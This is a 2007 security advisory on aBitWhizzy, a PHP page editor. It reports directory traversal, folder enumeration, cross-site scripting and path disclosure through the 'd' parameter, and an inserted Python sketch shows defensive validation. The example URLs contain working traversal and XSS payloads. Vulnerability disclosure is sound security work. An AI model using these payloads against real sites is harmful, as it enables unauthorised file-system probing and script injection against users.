abitwhizzy-traverse.txt

2007-03-29T00:00:00
ID PACKETSTORM:55452
Type packetstorm
Reporter Lostmon
Modified 2007-03-29T00:00:00

Description

################################################
aBitWhizzy traversal folder enumeration and XSS  
vendor url: http://www.unverse.net/abitwhizzy/  
Advisory: http://lostmon.blogspot.com/2007/03/abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES  
################################################  
  
aBitWhizzy is a php script that uses whizzywig.js to create  
and edit web pages through a WYSIWYG interface, right through  
your browser. Now your site can be updated by people with no  
knowledge of HTML, FTP or AIG (Abbreviations In General).  
  
aBitWhizzy contains a flaw that allows remote traversal and
arbitrary folder enumeration. This flaw exists because the
application does not validate the 'd' variable upon submission
to the 'whizzylink.php', 'whizzypic.php', 'whizzery/whizzypic.php' and
'whizzery/whizzylink.php' scripts. This could allow a
remote user to create a specially crafted URL containing
'../' directory traversal sequences to view the folder
structure on the target system with the privileges
of the target web service.

The same input validation error also permits cross-site scripting
attacks and full path disclosure.
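As an added illustration (not code from the advisory or from aBitWhizzy itself), the following Python sketch shows the validation the 'd' parameter lacks: it refuses traversal instead of stripping it, escapes the value before echoing it back, and answers invalid requests with a fixed message so the install path is never disclosed. The base directory is a constructed placeholder; the real install path is not given in the advisory.

```python
import html
import posixpath
from pathlib import PurePosixPath
from urllib.parse import quote, unquote

# Constructed placeholder; the real aBitWhizzy install path is not on the page.
BASE_DIR = PurePosixPath("/var/www/abitwhizzy/whizzery/pics")


class InvalidFolder(ValueError):
    """Raised when the requested folder cannot be served from BASE_DIR."""


def resolve_folder(raw_d, base=BASE_DIR):
    """Map the query-string value of 'd' onto a folder under base.

    The advisory's payloads ('../../../Documents%20and%20Settings', with or
    without a leading '/') are rejected by refusing any absolute path and any
    '..' component. Rejecting beats stripping: stripping '../' is bypassable
    with sequences such as '....//'.
    """
    d = unquote(raw_d)  # check the decoded value, as PHP would receive it
    if "\x00" in d:
        raise InvalidFolder("NUL byte in folder name")
    candidate = PurePosixPath(d)
    if candidate.anchor or ".." in candidate.parts:
        raise InvalidFolder("traversal attempt")
    # Lexical normalisation only, then confirm the result still sits under base.
    resolved = PurePosixPath(posixpath.normpath(str(base / candidate)))
    if resolved != base and base not in resolved.parents:
        raise InvalidFolder("resolved outside base")
    return resolved


def render_folder_link(raw_d, base=BASE_DIR):
    """HTML echoed back for a valid folder; the name is escaped so a value such
    as "><SCRIPT>alert('XSS')</SCRIPT> stays text instead of closing the tag."""
    folder = resolve_folder(raw_d, base)
    rel = "" if folder == base else str(folder.relative_to(base))
    return '<a href="?d=%s">%s</a>' % (html.escape(quote(rel)), html.escape(rel))


def handle_request(raw_d, base=BASE_DIR):
    """Return (status, body). The error body is a constant, so the full path
    that the advisory's d=' request leaks through a PHP warning never appears."""
    try:
        return 200, render_folder_link(raw_d, base)
    except InvalidFolder:
        return 400, "Invalid folder"
```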
  
###################  
VERSIONS  
###################  
  
Unknown version of aBitWhizzy  
  
##################  
SOLUTION  
##################  
  
No solution was available at this time!!  
  
######################  
TIMELINE  
######################  
  
discovered:25-03-2007  
vendor notify:25-03-2007  
vendor response:---------  
Private Disclosure:25-03-2007  
public disclosure:27-03-2007  
  
#######################  
Examples  
#######################  
  
Path disclosure:  
  
http://localhost/abitwhizzy/whizzylink.php?d='  
http://localhost/abitwhizzy/whizzypic.php?d='  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='  
  
Folder enumeration:  
  
  
http://localhost/abitwhizzy/whizzylink.php?d=  
../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzypic.php?d=  
../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=  
/../../../../../../../Documents%20and%20Settings  
  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=  
/../../../../../../../Documents%20and%20Settings  
  
  
Cross Site Scripting:  
  
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=  
/../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=  
/../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzypic.php?d=  
../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
http://localhost/abitwhizzy/whizzylink.php?d=  
../../../../../../../Documents%20and%20Settings  
"><SCRIPT>alert('XSS')</SCRIPT>  
  
  
########################### End ###################################  
  
Thanks to Estrella, I love you a lot ;P  
Thanks to all of Lostmon's Group Team  
  
--  
Sincerely:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
Curiosity is what makes the mind move....  
  
  
  